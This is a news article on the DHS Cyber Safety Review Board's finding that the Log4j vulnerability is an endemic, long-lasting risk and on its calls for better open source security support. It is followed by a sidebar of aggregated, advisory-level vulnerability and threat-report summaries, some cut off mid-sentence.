Headline
DHS Review Board Deems Log4j an 'Endemic' Cyber Threat
Vulnerability will remain a “significant” threat for years to come and highlighted the need for more public and private sector support for open source software ecosystem, Cyber Safety Review Board says.
The US Department of Homeland Security’s Cyber Safety Review Board (CSRB) has concluded that the Apache Log4j vulnerability disclosed in December 2021 will remain a significant risk to organizations for the next decade or longer.
The recently formed board, made up of private industry and government cybersecurity experts, determined that the open source community is not adequately resourced to ensure the security of its code and requires broad assistance from stakeholders across the private and public sectors. In a report published, today, the board recommended that federal agencies — as some of the largest consumers of open source code — contribute to open source security and called on the government to consider funding investments to improve security of the ecosystem.
CSRB released a set of 19 high-level recommendations for organizations to mitigate exposure to Log4j-related attacks and other similar software supply chain risks going forward. The recommendations for organizations include looking for and replacing vulnerable Log4j versions, establishing processes to prevent re-introduction of vulnerable versions into the environment, and maintaining an accurate inventory of IT assets and applications.
An Endemic Vulnerability
The CSRB’s conclusions and recommendations are based on its months-long investigation into the circumstances surrounding the Log4j vulnerability disclosure and the response to it from the open source community, technology vendors, and government and private organizations.
“The Board assesses that Log4j is an ‘endemic vulnerability’ and that vulnerable instances of Log4j will remain in systems for many years to come,” the CSRB said a report Thursday that summarized its findings.
“Though exploitation of Log4j has been at lower levels than expected and there has been no big Log4j attacks on critical infrastructure targets, the threat is not diminished,” the report noted. “Significant risk remains.”
“The most important aspects of the CSRB report should not surprise anyone who understands the reality of our complex interconnected world,” says Katie Moussouris, founder and CEO of Luta Security and a CSRB member. “We depend on open source technology that isn’t as well-supported from a security standpoint even though we need it to be, to help combat threats,” she says.
The DHS established CSRB in February 2022 in response to a cybersecurity Executive Order the Biden administration issued last May. The CSRB’s mandate is to get security experts from government and private organizations to review and assesses significant security events so improvements can be at a national level to prevent similar incidents. The Log4j review was the CSRB’s first mission.
Apache Log4j is an open source logging tool that is present in almost every single Java application environment. In November 2021, a security engineer with China’s e-commerce giant Alibaba reported a vulnerability (CVE-2021-44228) in Log4j to its maintainer, the Apache Software Foundation (ASF). The vulnerability — in a Log4j component for data storage and retrieval called Java Naming and Directory Interface (JNDI) — basically gave attackers a way to take complete remote control of vulnerable systems. Public disclosure of the vulnerability on Dec. 9, 2021, triggered widespread concern because it was easy to exploit, was ubiquitously present, and had disastrous consequences.
Another major, continuing issue — and one that the CSRB highlighted in its report — is the fact that vulnerable versions of Log4j are often not easily detected because of how deeply embedded the component can be in many environments.
A Preventable Catastrophe?
The CSRB review showed that an individual member of the open source community submitted the vulnerable JNDI component for inclusion with Log4j back in 2013. The Log4j team accepted the component, and it was later integrated into thousands of applications that used Log4j. The Board determined that the vulnerability could have been detected back in 2013 if the Log4j team had someone with security skills to review the code, or if they had training in secure coding practices.
“Unfortunately, the resources to perform such a review were not available to the volunteer developers who led this open-source project in 2013,” the Board said.
Investigators found that the organizations which responded most effectively to the Log4j vulnerability disclosure were also the ones that had effective asset and risk management processes in place and had the resources to mobilize quick action on an enterprisewide scale. But few organizations were able to mount that kind of response, or had the speed required to respond to a vulnerability of this magnitude, CSRB found. As a result, there was considerable delay in both their assessment of risk from the vulnerability and in their management of it. Many had to decide whether to upgrade to the fixed version of Log4j that the ASF released — and risk business disruption from potential application breakages — or leave the vulnerability untouched and risk attack.
“The Log4j event highlighted fundamental adoption gaps in vulnerability response practices and overall cybersecurity hygiene,” the report said.
Moussouris says Log4j highlighted the critical need for organizations to know their assets and what versions of software are running on their critical systems. “What might surprise the public is that so few organizations actually have a current list of their critical assets and what software is running on their networks,” she says. “We’re not prepared to respond to the next library incident until that changes.”
One major takeaway from CSRB’s report is the need for more coordinated action around open source security. Often, widely used open source components such as Log4j are maintained by volunteer teams with little consideration for security. They typically do not have coordinated vulnerability disclosure and response teams to investigate reported vulnerabilities and to address them.
“To reduce recurrence of the introduction of vulnerabilities like Log4j, it is essential that public and private sector stakeholders create centralized resourcing and security assistance structures that can support the open-source community going forward,” CSRB said.
Increased Support for Open Source Ecosystem
Eric Brewer, vice president of infrastructure at Google, says the report provides a positive and nuanced view of how organizations need to approach open source use in their environments. “If you are using open source, you can’t expect other people to magically fix security issues for you,” he says. Implicit in the use of open source code is the fact that organizations are consuming the software “as-is.” That means they need to share responsibility for mitigating risk associated with it as well, Brewer says.
He welcomes the CSRB’s call for increased investments around open source security and says what’s also needed are more organizations that can serve as curators for major open source projects. Big companies such as Google could fix vulnerabilities in open source code that they themselves consume and then offer the curated software so others can safely use it. He points to other organizations such as Red Hat and Databricks, which offer curated versions of major open source projects, as other examples.
“Open source software is fundamentally managed differently than commercial software, but open source software plays a key role in the success of commercial software,” says Tim Mackey, principal security strategy at Synopsys Cybersecurity Research Center. Organizations that depend on a commercial vendor to alert them of a problem in an open source component are presuming the vendor is properly managing their usage of open source and that they are able to identify and alert all users of their impacted software. To mitigate the risk, “software consumers should implement a trust-but-verify model to validate whether the software they’re given doesn’t contain unpatched vulnerabilities,” Mackey says.
Related news
Cybersecurity researchers have developed a proof-of-concept (PoC) code that exploits a recently disclosed critical flaw in the Apache OfBiz open-source Enterprise Resource Planning (ERP) system to execute a memory-resident payload. The vulnerability in question is CVE-2023-51467 (CVSS score: 9.8), a bypass for another severe shortcoming in the same software (
An issue was discovered in the function gdev_prn_open_printer_seekable() in Artifex Ghostscript through 10.02.0 allows remote attackers to crash the application via a dangling pointer.
Docker Desktop before 4.23.0 allows Access Token theft via a crafted extension icon URL. This issue affects Docker Desktop: before 4.23.0.
Categories: Exploits and vulnerabilities Categories: News Tags: Zoho ManageEngine Tags: CVE-2021-40539 Tags: Log4Shell Tags: CVE-2021-44228 Tags: CVE-2021-13379 Tags: ProxyShell Tags: CVE-2021-34473 Tags: CVE-2021-31207 Tags: CVE-2021-34523 Tags: CVE-2021-26084 Tags: Atlassian Tags: CVE-2022-22954 Tags: CVE-2022-22960 Tags: CVE-2022-26134 Tags: CVE-2022-1388 Tags: CVE-2022-30190 Tags: Follina What can the routinely exploited vulnerabilities of 2022 tell us, and what do we think will make it on to next year's list? (Read more...) The post 2022's most routinely exploited vulnerabilities—history repeats appeared first on Malwarebytes Labs.
Arbitrary file reading vulnerability in Apache Software Foundation Apache OFBiz when using the Solr plugin. This is a pre-authentication attack. This issue affects Apache OFBiz: before 18.12.07.
Dell Streaming Data Platform prior to 1.4 contains Open Redirect vulnerability. An attacker with privileges same as a legitimate user can phish the legitimate the user to redirect to malicious website leading to information disclosure and launch of phishing attacks.
SQL Injection vulnerability in Talend ESB Runtime 7.3.1-R2022-09-RT thru 8.0.1-R2022-10-RT when using the provisioning service.
An improper neutralization of input during web page generation ('Cross-site Scripting') [CWE-79] vulnerability in Sling App CMS version 1.1.2 and prior may allow an authenticated remote attacker to perform a reflected cross-site scripting (XSS) attack in the site group feature. Upgrade to Apache Sling App CMS >= 1.1.4
Canon Medical Informatics Vitrea Vision 7.7.76.1 does not adequately enforce access controls. An authenticated user is able to gain unauthorized access to imaging records by tampering with the vitrea-view/studies/search patientId parameter.
Iranian government-sponsored threat actors have been blamed for compromising a U.S. federal agency by taking advantage of the Log4Shell vulnerability in an unpatched VMware Horizon server. The details, which were shared by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), come in response to incident response efforts undertaken by the authority from mid-June through mid-July 2022
Frauscher Sensortechnik GmbH FDS102 for FAdC R2 and FAdCi R2 v2.8.0 to v2.9.1 are vulnerable to malicious code upload without authentication by using the configuration upload function. This could lead to a complete compromise of the FDS102 device.
Ransomware and pre-ransomware engagements make up 40 percent of threats seen this quarter By Caitlin Huey. For the first time since compiling these reports, Cisco Talos Incident Response saw an equal number of ransomware and pre-ransomware engagements, making up nearly 40 percent of threats this quarter. It can be difficult to determine what constitutes a pre-ransomware attack if ransomware never executes and encryption does not take place. However, Talos IR assesses that the combination of Cobalt Strike and credential-harvesting tools like Mimikatz, paired with enumeration and discovery techniques, indicates a high likelihood that ransomware is the final objective. This quarter featured a variety of publicly available tools and scripts hosted on GitHub repositories or other third-party websites to support operations across multiple stages of the attack lifecycle. This activity coincides with a general increase in the use of other dual-use tools, such as the legitimate red-teaming ...
Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Upload). Supported versions that are affected are 12.2.3-12.2.11. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks of this vulnerability can result in takeover of Oracle Web Applications Desktop Integrator. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
A security vulnerability has been identified in Apache Kafka. It affects all releases since 2.8.0. The vulnerability allows malicious unauthenticated clients to allocate large amounts of memory on brokers. This can lead to brokers hitting OutOfMemoryException and causing denial of service. Example scenarios: - Kafka cluster without authentication: Any clients able to establish a network connection to a broker can trigger the issue. - Kafka cluster with SASL authentication: Any clients able to establish a network connection to a broker, without the need for valid SASL credentials, can trigger the issue. - Kafka cluster with TLS authentication: Only clients able to successfully authenticate via TLS can trigger the issue. We advise the users to upgrade the Kafka installations to one of the 3.2.3, 3.1.2, 3.0.2, 2.8.2 versions.
Insufficient access control vulnerability was discovered in the Crestron AirMedia Windows Application, version 4.3.1.39, in which a user can pause the uninstallation of an executable to gain a SYSTEM level command prompt.
Trustwave report also finds 2022 is set to surpass 2021 for volume of critical CVEs
Directory Traversal vulnerability ZDBQAREFSUBDIR parameter in /zropusermgmt API in Zoho ManageEngine Analytics Plus before 4350 allows remote attackers to run arbitrary code.
Commodity malware usage surpasses ransomware by narrow margin By Caitlin Huey. For the first time in more than a year, ransomware was not the top threat Cisco Talos Incident Response (CTIR) responded to this quarter, as commodity malware surpassed ransomware by a narrow margin. This is likely due to several factors, including the closure of several ransomware groups, whether it be of their own volition or the actions of global law enforcement agencies and governments. Commodity malware was the top observed threat this quarter, a notable development given the general decrease in observations of attacks leveraging commodity trojans in CTIR engagements since 2020. These developments coincide with a general resurgence of certain email-based trojans in recent months, as law enforcement and technology companies have continued to attempt to disrupt and affect email-based malware threats like Emotet and Trickbot. This quarter featured malware such as the Remcos remote access trojan ...
Open-Xchange App Suite versions 7.10.6 and below suffer from OS command injection and cross site scripting vulnerabilities. One particular cross site scripting issue only affects versions 7.10.5 and below.
What are container image vulnerabilities?
The U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the Coast Guard Cyber Command (CGCYBER), on Thursday released a joint advisory warning of continued attempts on the part of threat actors to exploit the Log4Shell flaw in VMware Horizon servers to breach target networks. "Since December 2021, multiple threat actor groups have exploited Log4Shell on unpatched,
Pure Storage FlashArray products running Purity//FA 6.2.0 - 6.2.3, 6.1.0 - 6.1.12, 6.0.0 - 6.0.8, 5.3.0 - 5.3.17, 5.2.x and prior Purity//FA releases, and Pure Storage FlashBlade products running Purity//FB 3.3.0, 3.2.0 - 3.2.4, 3.1.0 - 3.1.12, 3.0.x and prior Purity//FB releases are vulnerable to a privilege escalation via the manipulation of Python environment variables which can be exploited by a logged-in user to escape a restricted shell to an unrestricted shell with root privileges. No other Pure Storage products or services are affected. Remediation is available from Pure Storage via a self-serve “opt-in” patch, manual patch application or a software upgrade to an unaffected version of Purity software.
By Flavio Costa, Chris Neal and Guilherme Venere. In a recent customer engagement, we observed a month-long AvosLocker campaign. The attackers utilized several different tools, including Cobalt Strike, Sliver and multiple commercial network scanners. The initial ingress point in this incident was... [[ This is only the beginning! Please visit the blog for the complete entry ]]
Versions of the Amazon AWS Apache Log4j hotpatch package before log4j-cve-2021-44228-hotpatch-1.3.5 are affected by a race condition that could lead to a local privilege escalation. This Hotpatch package is not a replacement for updating to a log4j version that mitigates CVE-2021-44228 or CVE-2021-45046; it provides a temporary mitigation to CVE-2021-44228 by hotpatching the local Java virtual machines. To do so, it iterates through all running Java processes, performs several checks, and executes the Java virtual machine with the same permissions and capabilities as the running process to load the hotpatch. A local user could cause the hotpatch script to execute a binary with elevated privileges by running a custom java process that performs exec() of an SUID binary after the hotpatch has observed the process path and before it has observed its effective user ID.
Couchbase Server before 7.1.0 has Incorrect Access Control.
EnemyBot DDoS botnet is rapidly weaponizing security bugs disclosed in CMS systems like WordPress plug-ins, Android devices, commercial Web servers, and other enterprise applications.
Malware borrows generously from code used by other botnets such as Mirai, Qbot and Zbot.
Calibre-Web before 0.6.18 allows user table SQL Injection.
The Apache Log4j hotpatch package before log4j-cve-2021-44228-hotpatch-1.1-13 didn’t mimic the permissions of the JVM being patched, allowing it to escalate privileges.
An Improper Input Validation vulnerability in DataImportHandler of Apache Solr allows an attacker to provide a Windows UNC path resulting in an SMB network call being made from the Solr host to another host on the network. If the attacker has wider access to the network, this may lead to SMB attacks, which may result in: * The exfiltration of sensitive data such as OS user hashes (NTLM/LM hashes), * In case of misconfigured systems, SMB Relay Attacks which can lead to user impersonation on SMB Shares or, in a worse-case scenario, Remote Code Execution This issue affects all Apache Solr versions prior to 8.11.1. This issue only affects Windows.
Published on: 2021 Dec 11, updated 2022 Apr 6. SUMMARY SUMMARY Microsoft continues our analysis of the remote code execution vulnerabilities related to Apache Log4j (a logging tool used in many Java-based applications) disclosed on 9 Dec 2021. Currently, Microsoft is not aware of any impact, outside of the initial disclosure involving Minecraft: Java Edition, to the security of our enterprise services and has not experienced any degradation in availability of those services as a result of this vulnerability.
Improper Access Control vulnerability in web service of Secomea SiteManager allows local attacker without credentials to gather network information and configuration of the SiteManager. This issue affects: Secomea SiteManager All versions prior to 9.5 on Hardware.